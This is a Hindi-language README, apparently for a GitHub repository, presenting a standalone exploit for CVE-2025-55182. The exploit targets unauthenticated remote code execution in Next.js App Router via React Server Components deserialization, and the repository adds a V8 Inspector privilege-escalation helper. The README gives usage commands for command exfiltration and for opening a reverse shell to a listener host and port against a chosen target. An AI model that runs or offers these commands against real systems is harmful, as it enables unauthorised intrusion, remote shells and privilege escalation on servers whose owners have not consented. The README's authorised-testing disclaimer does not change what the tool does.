
CVE-2025-55182 के लिए स्टैंडअलोन एक्सप्लॉइट जो React Server Components Flight deserialization के माध्यम से Next.js App Router में बिना प्रमाणीकरण के RCE प्राप्त करता है, साथ ही रिवर्स शेल और Node.js V8 Inspector विशेषाधिकार वृद्धि सहायक के साथ।
Next.js App Router ऐप्स में CVE-2025-55182 के लिए स्टैंडअलोन एक्सप्लॉइट जो React Server Components को सक्षम करते हैं। सर्वर-एक्शन एंडपॉइंट पर तैयार किए गए RSC Flight पेलोड बिना प्रमाणीकरण के रिमोट कोड निष्पादन देते हैं। इसमें एक Node.js V8 Inspector (debug-port) स्थानीय विशेषाधिकार-वृद्धि सहायक शामिल है जो process.mainModule.require सैंडबॉक्स बाईपास के माध्यम से एक विशेषाधिकार प्राप्त प्रक्रिया में कोड चलाता है।
CVE: CVE-2025-55182
python3 -m pip install requests # Python PoC(s) के लिए
cdp_privesc.pypython3 cdp_privesc.py <target>
react2shell-poc.py (RSC RCE — वेंडर किया गया, क्रेडिट्स देखें)python3 react2shell-poc.py -t http://TARGET:3000 -c "id" # त्रुटि-आधारित कमांड एक्सफिल
python3 react2shell-poc.py -t http://TARGET:3000 --revshell --lhost LHOST --lport 4444
react2shell-poc.py p3ta00 का सार्वजनिक CVE-2025-55182 PoC है, जिसे एक स्व-निहित श्रृंखला के लिए
https://github.com/p3ta00/react2shell-poc से बिना बदलाव के वेंडर किया गया है।
cdp_privesc.py (Node.js V8 Inspector स्थानीय privesc) मूल है।
केवल अधिकृत सुरक्षा परीक्षण और शिक्षा के लिए। इसे केवल उन्हीं सिस्टमों के विरुद्ध चलाएँ जिनके आप स्वामी हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति है।
लेखक: r3vpwnx